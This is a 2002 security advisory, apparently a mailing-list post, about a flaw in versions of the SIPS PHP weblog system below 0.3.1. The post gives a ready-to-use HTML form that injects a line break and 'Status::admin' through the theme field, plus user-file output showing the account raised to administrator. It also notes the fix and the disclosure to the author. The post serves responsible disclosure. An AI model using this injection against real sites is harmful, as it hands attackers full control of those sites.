#!/exploit/by/b0iler # sips - http://sourceforge.net/projects/sips/ # versions lower than 0.3.1 Taken from freshmeat: "About: SIPS is an integrated Weblog and link-indexing system written in PHP. It is aimed at those with access to databaseless, PHP-enabled Web servers who want to run a Weblog site like Slashdot and/or a simple link index like Yahoo!." Ok, this one took awhile to find since the code is long, but atleast it was fairly easy to read. The script works much like phpnuke or slashcode, SIPS stands for Simple Internet Publishing System. The problem that I found was when a user selects a theme to use it is written in their database file. Then when a user goes to use admin.php it just checks if the password for the user is correct and if they have the value Status equal to admin in their database. So I did alittle playing around and got a theme to do a linebreak and write Status::admin onto the end of the user's database. This makes the user an admin of the script giving them complete control over the site. Key to securing this code is to filter all input, even if you think it won't be changed by the user.. it can be. Also checking to make sure the theme exists might be good. To exploit this we just need to change the theme's page to something like this: <form action="http://www.site.com/sips/htdocs/preferences.php"; method="post"> <input type="hidden" name="op" value="theme"> <input type="hidden" name="action" value="settheme"> <select name="themename"> <option value="default Status::admin ">Exploited</option> </select> <input type="submit" value="Set Theme"></form> Here we submit a theme with the value of: Default -linebreak Status::admin -linebreak (SIPS chops the theme input). This will change an account from something like this: bash-2.03$ cat user Password::660120d6fbc1sn241be39290636b2942 Email::b0iler@hotmail.com Theme::default Timezone::Greenwich Mean to something like this: bash-2.03$ cat user Password::660120d6fbc1sn241be39290636b2942 Email::b0iler@hotmail.com Timezone::Greenwich Mean Theme::default Status::admin The Status::admin allows you to use http://www.site.com/sips/htdocs/admin/index.php, which will give you total control over SIPS (pretty much the whole site). The author was contacted on 2/1/02 and replied the same day. Author updated to version 0.3.1 on 2/8/02 and wrote a very nice page detailing the problem and possible solutions: http://sips.sourceforge.net/adminvul.html -http://b0iler.advknowledge.net _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com
